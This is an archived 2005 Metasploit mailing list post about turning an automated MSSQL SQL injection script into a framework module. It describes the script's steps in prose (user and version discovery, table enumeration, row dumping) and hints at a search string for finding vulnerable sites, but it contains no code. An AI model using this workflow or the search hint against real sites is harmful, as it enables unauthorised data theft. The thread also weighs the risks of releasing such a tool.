Metasploit mailing list archives
using Meterpreter , out of MSF // SQL Injection module
From: mmiller at hick.org (mmiller at hick.org)
Date: Sun, 30 Oct 2005 02:21:25 -0600
On Sun, Oct 30, 2005 at 10:02:23AM +0200, RaMatkal wrote:
The script was developed a while ago to automatically exploit SQL injection vulns on MSSQL. Basically it works as follows: A- Determines USER connected to the database B- Determines DB version C- Enumerates table and col names D- Saves first x rows of selected tables into .csv files The script could easily be extended to a variety of other things such as use extended stored procedures to read/write from remote fs and execute commands The problem i see implementing it in metasploit is 2fold: i) Different apps/servers return different error messages and so metasploit would need some sort of variable which would need to define how to extract the relevant information from the error message. This is currently done manually by editing the perl script and tweaking it for different servers/apps...sometimes it takes a couple of minutes to get it right....
Well, one way to implement this would be to provide some sort of abstract class that allows you to define a common interface to the SQL injection tasks that can be shared and overridden by derived classes that have an app-specific or server specific error message handler. You could then just basically have either a hierarchical or linear search asking each of the (potentially ranked) classes which would be most likely capable of handling the specific error format. This sort of approach actually plays quite well into msf 3.0's recon modules that are designed to be extensible and sharable in nature.
ii) The reason i have not released the script is for fear of script kiddies....the amount of sites which are vulnerable to SQL injection is still extremely high....a search on google for ".asp?id=1" reveals thousands of thousands of sites which could easily be exploited.....
Always a valid concern. I think it's fair to not release something if the potential for abuse is high. Unfortunately, there is no universal answer :)
Current thread:
- using Meterpreter , out of MSF // SQL Injection module, (continued)
- using Meterpreter , out of MSF // SQL Injection module Jerome Athias (Oct 27)
- using Meterpreter , out of MSF // SQL Injection module news-letters (Oct 27)
- using Meterpreter , out of MSF // SQL Injection module mmiller at hick.org (Oct 27)
- using Meterpreter , out of MSF // SQL Injection module Fabrice MOURRON (Oct 27)
- using Meterpreter , out of MSF // SQL Injection module Andre Ludwig (Oct 27)
- using Meterpreter , out of MSF // SQL Injection module Kurt Grutzmacher (Oct 27)
- using Meterpreter , out of MSF // SQL Injection module jasf (Oct 27)
- using Meterpreter , out of MSF // SQL Injection module Hamid . K (Oct 28)